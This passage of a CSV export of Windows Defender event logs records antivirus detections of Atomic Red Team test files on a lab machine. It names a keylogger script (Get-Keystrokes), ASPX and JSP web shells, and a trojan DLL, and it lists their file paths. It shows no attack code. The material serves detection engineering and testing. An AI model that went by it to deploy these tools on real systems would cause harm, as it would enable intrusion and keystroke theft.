<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:Win32/Sehyioa.A!cl&amp;threatid=2147726426&amp;enterprise=0</Data>
<Data Name=""Status Code"">3</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Category ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:53:31.900809Z"">
</TimeCreated>
<EventRecordID>103</EventRecordID>
<Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:18.385Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147683177</Data>
<Data Name=""Threat Name"">Backdoor:ASP/Ace.T</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">6</Data>
<Data Name=""Category Name"">Backdoor</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Backdoor:ASP/Ace.T&amp;threatid=2147683177&amp;enterprise=0</Data>
<Data Name=""Status Code"">3</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Category ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:51:50.798994Z"">
</TimeCreated>
<EventRecordID>102</EventRecordID>
<Correlation ActivityID=""40013F0F-EF76-4940-A8B2-4DE50BE9AAC3"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:16.697Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147708292</Data>
<Data Name=""Threat Name"">HackTool:JS/Jsprat</Data>
<Data Name=""Severity ID"">4</Data>
<Data Name=""Severity Name"">High</Data>
<Data Name=""Category ID"">34</Data>
<Data Name=""Category Name"">Tool</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=HackTool:JS/Jsprat&amp;threatid=2147708292&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068)</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:51:50.275470Z"">
</TimeCreated>
<EventRecordID>101</EventRecordID>
<Correlation ActivityID=""6E1A750F-42C6-491E-941A-12F6AF57EBD2"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147725349</Data>
<Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
<Data Name=""Status Code"">103</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x80508023</Data>
<Data Name=""Error Description"">The program could not find the malware and other potentially unwanted software on this device. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:51:50.275470Z"">
</TimeCreated>
<EventRecordID>101</EventRecordID>
<Correlation ActivityID=""6E1A750F-42C6-491E-941A-12F6AF57EBD2"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147725349</Data>
<Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
<Data Name=""Status Code"">103</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x80508023</Data>
<Data Name=""Error Description"">The program could not find the malware and other potentially unwanted software on this device. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:41:48.236136Z"">
</TimeCreated>
<EventRecordID>95</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}</Data>
<Data Name=""Detection Time"">2019-07-18T20:41:40.357Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147726426</Data>
<Data Name=""Threat Name"">Trojan:Win32/Sehyioa.A!cl</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:Win32/Sehyioa.A!cl&amp;threatid=2147726426&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:41:17.508276Z"">
</TimeCreated>
<EventRecordID>76</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:18.385Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147683177</Data>
<Data Name=""Threat Name"">Backdoor:ASP/Ace.T</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">6</Data>
<Data Name=""Category Name"">Backdoor</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Backdoor:ASP/Ace.T&amp;threatid=2147683177&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:41:16.418508Z"">
</TimeCreated>
<EventRecordID>75</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:16.697Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147708292</Data>
<Data Name=""Threat Name"">HackTool:JS/Jsprat</Data>
<Data Name=""Severity ID"">4</Data>
<Data Name=""Severity Name"">High</Data>
<Data Name=""Category ID"">34</Data>
<Data Name=""Category Name"">Tool</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=HackTool:JS/Jsprat&amp;threatid=2147708292&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005)</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 1.1.16100.4</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:40:16.396422Z"">
</TimeCreated>
<EventRecordID>48</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{8791B1FB-0FE7-412E-B084-524CB5A221F3}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:13.775Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147735426</Data>
